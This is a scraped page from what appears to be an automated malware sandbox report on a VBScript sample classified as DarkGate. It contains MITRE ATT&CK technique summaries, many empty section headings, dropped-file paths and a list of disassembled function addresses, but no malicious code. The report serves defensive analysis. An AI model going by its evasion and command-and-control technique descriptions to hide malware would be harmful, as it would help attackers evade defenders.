Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DarkGate

Yara Signatures

Memory Dumps

Sigma Signatures

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\bpzs\Autoit3.exe

C:\bpzs\bpzs.exe

C:\bpzs\szkzjr.au3

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
1.vbs

Function 00007FF7F8D07F2C Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 279
COMMON

Function 00007FF7F8D07C64 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 260
COMMON

Function 00007FF7F8D07C6A Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 255
COMMON

Function 00007FF7F8D07D82 Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 232
COMMON

Function 00007FF7F8D07D2D Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 213
COMMON

Function 00007FF7F8D07D8C Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 224
COMMON

Function 00007FF7F8D2E068 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 119
libraryloaderCOMMON

Function 00007FF7F8D0C0E4 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 379
fileCOMMON

Function 00007FF7F8D1BF2C Relevance: 35.2, APIs: 28, Instructions: 228
COMMON

Function 00007FF7F8D08037 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 172
fileCOMMON

Function 00007FF7F8D07EE5 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 146
COMMON

Function 00007FF7F8D4864C Relevance: 24.1, APIs: 16, Instructions: 92
COMMON

Function 00007FF7F8D18220 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216
networkCOMMON

Function 00007FF7F8D17B90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 108
networkCOMMON

Function 00007FF7F8D0CFC4 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 157
COMMON